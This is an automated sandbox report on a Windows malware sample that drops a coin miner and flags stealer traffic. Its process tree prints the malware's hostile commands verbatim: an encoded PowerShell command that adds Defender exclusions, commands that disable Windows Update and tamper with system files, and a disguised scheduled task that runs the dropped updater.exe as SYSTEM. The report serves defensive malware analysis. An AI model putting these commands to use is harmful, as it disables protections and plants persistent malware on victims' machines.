Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-05-2022 12:32
Static task
static1
General
-
Target
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
-
Size
184KB
-
MD5
03bc0abedf428f004fb59b738d2c2923
-
SHA1
f2e1f9a0eabb21c4287114ef4062cb3389cce2c8
-
SHA256
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48
-
SHA512
cb1344fbc66d84e467bb16f41f7a41c55130e51be4a642364376b28139170234a3ec46cb84eedbf7b5a0fb3adc4191f536ae8f0c05598be4aac0cd4aaa25e372
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/4984-229-0x000000014036DAD4-mapping.dmp xmrig behavioral1/memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral1/memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
838029.exeupdater.exepid process 4220 838029.exe 1332 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2664 takeown.exe 240 icacls.exe 2332 takeown.exe 4564 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe -
Loads dropped DLL 7 IoCs
Processes:
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exepid process 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4564 icacls.exe 2664 takeown.exe 240 icacls.exe 2332 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 freegeoip.app 17 freegeoip.app -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 2744 set thread context of 2320 2744 conhost.exe conhost.exe PID 2744 set thread context of 4984 2744 conhost.exe explorer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 2348 powershell.exe 2348 powershell.exe 2220 conhost.exe 3260 powershell.exe 3260 powershell.exe 2744 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 2220 conhost.exe Token: SeShutdownPrivilege 3928 powercfg.exe Token: SeCreatePagefilePrivilege 3928 powercfg.exe Token: SeShutdownPrivilege 4776 powercfg.exe Token: SeCreatePagefilePrivilege 4776 powercfg.exe Token: SeShutdownPrivilege 4884 powercfg.exe Token: SeCreatePagefilePrivilege 4884 powercfg.exe Token: SeShutdownPrivilege 4700 powercfg.exe Token: SeCreatePagefilePrivilege 4700 powercfg.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 2744 conhost.exe Token: SeShutdownPrivilege 4636 powercfg.exe Token: SeCreatePagefilePrivilege 4636 powercfg.exe Token: SeShutdownPrivilege 2948 powercfg.exe Token: SeCreatePagefilePrivilege 2948 powercfg.exe Token: SeShutdownPrivilege 2284 powercfg.exe Token: SeCreatePagefilePrivilege 2284 powercfg.exe Token: SeShutdownPrivilege 3116 powercfg.exe Token: SeCreatePagefilePrivilege 3116 powercfg.exe Token: SeLockMemoryPrivilege 4984 explorer.exe Token: SeLockMemoryPrivilege 4984 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe838029.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2892 wrote to memory of 4220 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 838029.exe PID 2892 wrote to memory of 4220 2892 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe 838029.exe PID 4220 wrote to memory of 2220 4220 838029.exe conhost.exe PID 4220 wrote to memory of 2220 4220 838029.exe conhost.exe PID 4220 wrote to memory of 2220 4220 838029.exe conhost.exe PID 2220 wrote to memory of 1936 2220 conhost.exe cmd.exe PID 2220 wrote to memory of 1936 2220 conhost.exe cmd.exe PID 1936 wrote to memory of 2348 1936 cmd.exe powershell.exe PID 1936 wrote to memory of 2348 1936 cmd.exe powershell.exe PID 2220 wrote to memory of 3496 2220 conhost.exe cmd.exe PID 2220 wrote to memory of 3496 2220 conhost.exe cmd.exe PID 2220 wrote to memory of 2060 2220 conhost.exe cmd.exe PID 2220 wrote to memory of 2060 2220 conhost.exe cmd.exe PID 3496 wrote to memory of 2132 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2132 3496 cmd.exe sc.exe PID 2060 wrote to memory of 3928 2060 cmd.exe powercfg.exe PID 2060 wrote to memory of 3928 2060 cmd.exe powercfg.exe PID 3496 wrote to memory of 4692 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4692 3496 cmd.exe sc.exe PID 2060 wrote to memory of 4776 2060 cmd.exe powercfg.exe PID 2060 wrote to memory of 4776 2060 cmd.exe powercfg.exe PID 3496 wrote to memory of 4104 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4104 3496 cmd.exe sc.exe PID 2060 wrote to memory of 4884 2060 cmd.exe powercfg.exe PID 2060 wrote to memory of 4884 2060 cmd.exe powercfg.exe PID 3496 wrote to memory of 2320 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2320 3496 cmd.exe sc.exe PID 2060 wrote to memory of 4700 2060 cmd.exe powercfg.exe PID 2060 wrote to memory of 4700 2060 cmd.exe powercfg.exe PID 3496 wrote to memory of 2036 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2036 3496 cmd.exe sc.exe PID 2220 wrote to memory of 3408 2220 conhost.exe cmd.exe PID 2220 wrote to memory of 3408 2220 conhost.exe cmd.exe PID 3496 wrote to memory of 796 3496 cmd.exe sc.exe PID 3496 wrote to memory of 796 3496 cmd.exe sc.exe PID 3408 wrote to memory of 964 3408 cmd.exe schtasks.exe PID 3408 wrote to memory of 964 3408 cmd.exe schtasks.exe PID 3496 wrote to memory of 4780 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4780 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4416 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4416 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4984 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4984 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4896 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4896 3496 cmd.exe sc.exe PID 3496 wrote to memory of 3964 3496 cmd.exe sc.exe PID 3496 wrote to memory of 3964 3496 cmd.exe sc.exe PID 3496 wrote to memory of 968 3496 cmd.exe sc.exe PID 3496 wrote to memory of 968 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4388 3496 cmd.exe sc.exe PID 3496 wrote to memory of 4388 3496 cmd.exe sc.exe PID 3496 wrote to memory of 3328 3496 cmd.exe sc.exe PID 3496 wrote to memory of 3328 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2096 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2096 3496 cmd.exe sc.exe PID 3496 wrote to memory of 2664 3496 cmd.exe takeown.exe PID 3496 wrote to memory of 2664 3496 cmd.exe takeown.exe PID 3496 wrote to memory of 240 3496 cmd.exe icacls.exe PID 3496 wrote to memory of 240 3496 cmd.exe icacls.exe PID 3496 wrote to memory of 3564 3496 cmd.exe reg.exe PID 3496 wrote to memory of 3564 3496 cmd.exe reg.exe PID 3496 wrote to memory of 2616 3496 cmd.exe reg.exe PID 3496 wrote to memory of 2616 3496 cmd.exe reg.exe PID 3496 wrote to memory of 4588 3496 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe"C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\838029.exe"C:\Users\Admin\AppData\Local\838029.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\838029.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\system32\sc.exesc stop wuauserv8⤵
-
C:\Windows\system32\sc.exesc stop bits8⤵
-
C:\Windows\system32\sc.exesc stop dosvc8⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc8⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled8⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q8⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""8⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled8⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f8⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
-
